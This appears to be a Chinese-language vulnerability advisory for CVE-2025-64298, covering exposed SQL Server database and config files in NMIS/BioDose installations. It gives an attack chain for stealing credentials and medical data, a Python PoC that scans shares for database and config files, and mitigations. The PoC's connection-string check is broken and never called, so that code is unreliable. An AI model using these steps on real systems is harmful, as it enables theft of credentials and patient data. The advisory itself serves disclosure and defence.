CVE-2025-64298: NMIS/BioDose V22.02及之前版本SQL Server数据库不安全目录访问漏洞

漏洞信息

漏洞编号

CVE-2025-64298

漏洞类型

不安全目录访问/敏感数据泄露

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NMIS/BioDose V22.02及之前版本

漏洞概述

CVE-2025-64298是影响NMIS/BioDose系统的重要安全漏洞，CVSS评分8.4，属于高危级别。该漏洞存在于V22.02及更早版本的安装程序中，当系统使用嵌入式Microsoft SQL Server Express时，其数据库和配置文件通过Windows共享目录暴露给网络中的客户端。由于默认配置使用了不安全的目录路径，攻击者可以在无需认证的情况下访问敏感的SQL Server数据库和配置文件，这些文件中可能包含用户名、密码、应用程序配置等敏感信息。此漏洞具有高机密性、完整性和可用性影响，攻击复杂度低，无需用户交互即可利用。

技术细节

漏洞根源在于NMIS/BioDose安装程序在配置嵌入式Microsoft SQL Server Express时，采用了默认的不安全目录路径设置。在网络安装场景中，SQL Server数据库文件（.mdf）、事务日志文件（.ldf）以及应用程序配置文件（如web.config、app.config等）被放置在可通过Windows共享访问的目录中。这些文件通常包含数据库连接字符串、加密密钥、用户凭证等敏感信息。攻击者通过本地网络访问该共享目录后，可以直接读取数据库文件或利用SQL Server的attach功能将数据库附加到攻击者控制的SQL Server实例中，从而获取完整的应用程序数据和系统配置信息。由于CVSS向量显示攻击向量为本地(AV:L)、无需认证(PR:N)、无需交互(UI:N)，攻击者可以在低复杂度情况下实现高影响的数据泄露和潜在的数据篡改。

攻击链分析

STEP 1

步骤1

攻击者通过本地网络访问目标系统的Windows共享目录

STEP 2

步骤2

定位到NMIS/BioDose安装目录下的数据库文件夹（默认路径配置不安全）

STEP 3

步骤3

访问SQL Server数据库文件（.mdf、.ldf）和配置文件

STEP 4

步骤4

读取配置文件获取数据库连接字符串和敏感凭证信息

STEP 5

步骤5

将数据库文件附加到攻击者控制的SQL Server实例或直接分析数据

STEP 6

步骤6

提取敏感数据，包括用户信息、应用程序配置和可能的医疗数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-64298 PoC - NMIS/BioDose SQL Server Database Access
Note: This is for authorized security testing only
"""
import os
import sys
import subprocess

def check_nmis_installation():
    """Check for default NMIS/BioDose installation paths"""
    default_paths = [
        r"\\\\localhost\\C$\\Program Files\\NMIS\\BioDose\\Database",
        r"\\\\localhost\\C$\\Program Files (x86)\\NMIS\\BioDose\\Database",
        r"\\\\server\\share\\NMIS\\Database",
        r"\\\\server\\share\\BioDose\\Database"
    ]
    
    print("[*] Scanning for NMIS/BioDose database paths...")
    for path in default_paths:
        try:
            if os.path.exists(path):
                print(f"[+] Found accessible path: {path}")
                list_database_files(path)
        except Exception as e:
            print(f"[-] Error accessing {path}: {e}")

def list_database_files(path):
    """List potential SQL Server database and config files"""
    extensions = ['.mdf', '.ldf', '.config', '.xml', '.ini']
    print(f"\n[*] Enumerating files in {path}...")
    
    for root, dirs, files in os.walk(path):
        for file in files:
            if any(file.lower().endswith(ext) for ext in extensions):
                full_path = os.path.join(root, file)
                size = os.path.getsize(full_path)
                print(f"    [FILE] {full_path} ({size} bytes)")

def extract_connection_strings(config_path):
    """Extract potential connection strings from config files"""
    print(f"\n[*] Analyzing config file: {config_path}")
    try:
        with open(config_path, 'r', encoding='utf-8', errors='ignore') as f:
            content = f.read()
            # Look for connection strings and sensitive data
            if 'connectionString' in content.lower():
                print("[+] Potential connection strings found!")
    except Exception as e:
        print(f"[-] Error reading {config_path}: {e}")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-64298 PoC - NMIS/BioDose Insecure Path Access")
    print("=" * 60)
    check_nmis_installation()
    print("\n[*] Scan complete.")

影响范围

NMIS/BioDose V22.02及所有更早版本

使用嵌入式Microsoft SQL Server Express的所有安装

防御指南

临时缓解措施

在官方补丁发布之前，建议立即采取以下临时缓解措施：1）检查并修改SQL Server数据库文件的存储位置，将其从可网络访问的共享目录移至受保护的本地目录；2）收紧Windows共享目录的访问控制列表（ACL），移除不必要的共享权限；3）对包含敏感信息的配置文件进行加密或重新部署到安全路径；4）启用网络分割，将NMIS/BioDose系统与其他网络区域隔离；5）部署入侵检测系统监控对数据库目录的异常访问；6）联系厂商获取具体的安全更新和配置加固指南。